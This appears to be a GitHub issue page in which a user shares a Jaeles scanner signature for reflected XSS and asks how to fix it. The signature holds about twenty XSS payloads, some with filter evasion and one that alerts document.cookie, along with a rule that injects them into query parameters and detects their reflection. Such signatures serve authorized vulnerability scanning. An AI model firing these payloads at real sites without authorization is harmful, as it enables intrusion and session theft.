jaeles-signatures icon indicating copy to clipboard operation
jaeles-signatures copied to clipboard

Published 20 hours ago verified publisher icon jaeles-project

help

Open Kalimon12 opened this issue 3 years ago • 0 comments

fuzz xss id: xss-reflected type: fuzz level: 1 info: name: XSS Fuzz on Param Basic risk: high

payloads: - '<svg%20onx=()%20onload=(confirm)(123)>' - '' - '"><svg/onload=alert(1337)>' - '<svg/onload=alert(1)' - '' - '%22><svg%20onload=confirm(1);>' - '"><svg/onload=alert(document.cookie)>' - '' - "onx+%00+onpointerenter%3dalert(domain)+x" - '<svgononload=( alert )( document.domain )>' - '/alert?.(1)%27"><Svg/OnLoad=%27' - 'test",prompt%0A/HelloWorld/(document.domain)' - '' - '<svg%0Aonauxclick=0;[1].some(confirm)//%20(1/4)' - '<svg%0Aonauxclick=0;[1].some(confirm)//%20(1/4)' - '<a"/onclick=(confirm)(document.cookie)>Click%20Here!' - '<svgononload=(%20alert%20)(%20document.domain%20)>' - 'onx+%00+onpointerenter%3dalert(domain)+x' - '<x/onclick=globalThis[%27\u0070r\u006f%27+%27mpt%27]<)>clickme' - 'javascript:https//www.google.com#%0aalert()' - '"><img%20src=x%20onerror=alert(1)>' - '%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E'

requests:

  • generators:
    • Query("{{.payload}}") detections:
      StringSearch("resHeaders", "text/html") && StringSearch("response", "{{.payload}}") && (StatusCode() == 200)

how fix

Kalimon12 avatar Aug 15 '21 15:08 Kalimon12